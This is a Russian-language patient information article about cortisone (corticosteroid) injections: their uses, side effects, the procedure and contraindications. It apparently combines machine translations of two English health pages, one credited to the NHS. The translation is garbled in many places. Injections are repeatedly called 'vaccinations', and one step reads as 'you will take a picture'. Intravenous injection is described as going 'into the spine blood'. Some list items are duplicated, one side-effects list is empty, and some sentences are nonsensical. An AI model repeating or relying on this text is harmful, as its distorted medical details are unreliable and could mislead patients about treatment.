Если у вас артрит, вы, возможно, рассматривали прививку кортизона как часть вашего плана лечения. Также называемые «кортикостероидом», «стероидным уколом» и антропогенной версией гормона кортизола, эти уколы не болеутоляющие. Кортизон — это разновидность стероидов, лекарства, снимающего воспаление, что может уменьшить боль.

Для чего используется кортизон?

Уколы кортизона можно использовать для лечения воспаления небольших участков тела, например воспаления определенного сустава или сухожилия. Они также могут лечить воспаление, которое широко распространено по всему телу, например, при аллергических реакциях, астме или ревматоидном артрите, который поражает многие суставы.

Ваш врач может назначить прививку кортизона для:

  • Боль в спине

  • Бурсит

  • Подагра

  • Остеоартрит

  • Остеоартрит

  • Тендинит

  • Тендинит Вы можете получить уколы в кабинете врача.Они быстро снимают воспаление только в одной части тела — например, в колене или локте, пораженном артритом.

    Один укол не будет иметь определенных побочных эффектов, таких как раздражение желудка, которые могут возникнуть при приеме других противовоспалительных препаратов.

    Недостатки и побочные эффекты инъекции кортизона

    Краткосрочные побочные эффекты редки, но они могут включать следующее:

    • Уменьшение и осветление цвета кожи, на которой вы получили инъекцию

    • Инфекция

    • Кровотечение из разорванных кровеносных сосудов кожи или мышц

    • Болезненность в месте укола

    • Обострение воспаления в области инъекции из-за реакции на лекарство (постинъекционная вспышка)

    Сухожилия могут быть ослаблены инъекциями кортикостероидов, и сообщалось о разрывах сухожилий.

    Если у вас диабет, инъекции кортизона могут повысить уровень сахара в крови. Если у вас инфекция, эти уколы могут затруднить выздоровление. Вы не сможете получить это лечение, если у вас есть проблемы со свертыванием крови.

    Долгосрочные побочные эффекты зависят от дозы и от того, как часто вы принимаете это лечение. При более высоких дозах и частых уколах потенциальные побочные эффекты включают:

    Редкие, но серьезные повреждения также могут произойти с костями крупных суставов (так называемый «аваскулярный некроз»).

    Что происходит, когда вам делают укол?

    Врач, медсестра или другой медицинский работник воспользуется чистящим раствором на спиртовой или йодной основе, чтобы очистить участок кожи, в который вам будет сделана прививка. После этого на это место нанесут обезболивающий лосьон или спрей. Тогда вы сделаете снимок. Вы должны чувствовать лишь небольшую боль. После этого вы будете носить повязку на месте инъекции.

    Если укол попадает в сустав, в котором слишком много жидкости, ваш врач сначала воспользуется отдельным шприцем и иглой, чтобы набрать лишнюю жидкость.

    Эффект от вашего укола может длиться до нескольких месяцев, прежде чем он исчезнет.

    Хотя это зависит от вашего состояния, ваш врач, скорее всего, ограничит частоту вакцинации кортизоном каждые 6 недель и не чаще четырех раз в год.

    Чего ожидать после укола кортизона

    Обычно в груди и лице чувствуется тепло или появляется покраснение вокруг места укола.

    Инструкции вашего врача могут включать:

    • Пакет со льдом в месте инъекции, если вы чувствуете боль

    • Только душ (без ванн или горячих ванн)

    • Будьте осторожны с областью вокруг инъекции во время пару дней.Например, если выстрел в колено, ограничьте упражнения ногой.

    Если вы заметили инфекцию, боль, покраснение или припухлость через 2 дня, позвоните своему врачу.

    Инъекции стероидов — NHS

    Инъекции стероидов, также называемые инъекциями кортикостероидов, представляют собой противовоспалительные препараты, используемые для лечения ряда заболеваний.

    Их можно использовать для лечения таких проблем, как боли в суставах, артрит, радикулит и воспалительные заболевания кишечника.

    Инъекции стероидов делают только медицинские работники. Общие примеры включают гидрокортизон, триамцинолон и метилпреднизолон.

    Как делают инъекции стероидов

    Стероидные инъекции обычно делает врач-специалист в больнице.

    Их можно вводить несколькими способами, в том числе:

    • в сустав (внутрисуставная инъекция)
    • в мышцу (внутримышечная инъекция)
    • в позвоночник (эпидуральная инъекция)
    • в позвоночник кровь (внутривенная инъекция)

    Обычно инъекции начинают действовать через несколько дней, хотя некоторые из них работают через несколько часов.Эффект обычно проходит через несколько месяцев.

    Если вам делают укол для облегчения боли, он также может содержать местный анестетик. Это обеспечивает немедленное облегчение боли, которое длится несколько часов.

    Вы сможете пойти домой вскоре после инъекции. Возможно, вам понадобится дать отдых обработанной части тела в течение нескольких дней.

    Побочные эффекты инъекций стероидов

    Возможные побочные эффекты инъекций стероидов зависят от места инъекции.

    Побочные эффекты инъекций в суставы, мышцы или позвоночник могут включать:

    • боль и дискомфорт в течение нескольких дней — при этом может помочь парацетамол
    • временный синяк или скопление крови под кожей
    • покраснение лица в течение нескольких часов
    • инфекция, вызывающая покраснение, отек и боль — если у вас есть эти симптомы, как можно скорее обратитесь за медицинской помощью
    • потеря жира в месте инъекции — это может вызвать ямочки на коже и может быть постоянный
    • более светлая кожа вокруг места инъекции — это может быть постоянным
    • , если у вас диабет, ваш уровень сахара в крови может повыситься на несколько дней
    • если у вас высокое кровяное давление, ваше кровяное давление может повыситься на несколько дней несколько дней

    Эпидуральные инъекции также могут иногда вызывать очень болезненную головную боль, которая облегчается только в положении лежа.Это должно вылечиться само по себе, но если у вас это получится, сообщите об этом своему специалисту.

    Побочные эффекты инъекций, вводимых в кровь, обычно похожи на побочные эффекты стероидных таблеток, такие как повышенный аппетит, изменения настроения и проблемы со сном.

    Вы можете сообщить о любых подозреваемых побочных эффектах в британскую систему безопасности.

    Кто может делать инъекции стероидов

    Большинство людей могут делать инъекции стероидов.

    Сообщите врачу перед лечением, если вы:

    • получали инъекции стероидов в последние несколько недель — обычно вам нужно подождать не менее 6 недель между инъекциями
    • вы сделали 3 инъекции стероидов за последний год — врачи обычно рекомендуют не более 3 инъекций в одну и ту же область в течение 12 месяцев
    • имели аллергическую реакцию на стероиды в прошлом
    • есть инфекция (включая глазные инфекции)
    • недавно перенесли или собираются есть, какие-либо прививки
    • беременны, кормят грудью или пытаются зачать ребенка
    • есть какие-либо другие заболевания, такие как диабет, эпилепсия, высокое кровяное давление или проблемы с печенью, сердцем или почками
    • принимают другие лекарства, такие как антикоагулянты

    Стероидные инъекции не всегда подходят в этих случаях, хотя врач может порекомендовать их, если считает, что польза перевешивает любые риски.

    Как работают инъекции стероидов

    Стероиды — это искусственная версия гормонов, которые обычно вырабатываются надпочечниками, двумя маленькими железами, расположенными над почками.

    При введении в сустав или мышцу стероиды уменьшают покраснение и отек (воспаление) в близлежащей области. Это может помочь уменьшить боль и скованность.

    При попадании в кровь они могут уменьшить воспаление по всему телу, а также снизить активность иммунной системы, естественную защиту организма от болезней и инфекций.

    Это может помочь в лечении аутоиммунных состояний, таких как рассеянный склероз (РС), которые вызваны ошибочной атакой иммунной системы на организм.

    Инъекции стероидов отличаются от анаболических стероидов, которые незаконно используются некоторыми людьми для увеличения своей мышечной массы.

    Последняя проверка страницы: 26 февраля 2020 г.
    Срок следующего рассмотрения: 26 февраля 2023 г.

    .
Разное

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *